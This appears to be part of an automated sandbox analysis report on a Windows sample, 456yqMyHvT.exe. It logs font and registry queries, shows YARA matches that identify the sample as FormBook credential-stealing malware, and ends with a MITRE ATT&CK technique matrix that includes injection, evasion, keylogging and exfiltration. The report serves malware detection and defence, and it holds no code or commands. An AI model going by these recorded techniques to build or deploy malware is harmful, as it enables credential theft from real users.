          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Entity\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Entity.dll VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.456yqMyHvT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.456yqMyHvT.exe.41fe970.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.456yqMyHvT.exe.42633b0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.456yqMyHvT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.456yqMyHvT.exe.4199f50.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000002.923803050.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.924038169.0000000001160000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.797957782.0000000000D80000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.797833968.0000000000D20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.923958720.0000000001010000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.704979180.0000000004131000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.706607375.00000000043B8000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.758649360.000000000DA94000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.456yqMyHvT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.456yqMyHvT.exe.41fe970.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.456yqMyHvT.exe.42633b0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.456yqMyHvT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.456yqMyHvT.exe.4199f50.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000002.923803050.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.924038169.0000000001160000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.797957782.0000000000D80000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.797833968.0000000000D20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.923958720.0000000001010000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.704979180.0000000004131000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.706607375.00000000043B8000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.758649360.000000000DA94000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsScheduled Task/Job1Scheduled Task/Job1Process Injection512Rootkit1Credential API Hooking1Security Software Discovery321Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsScheduled Task/Job1Masquerading1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection512LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
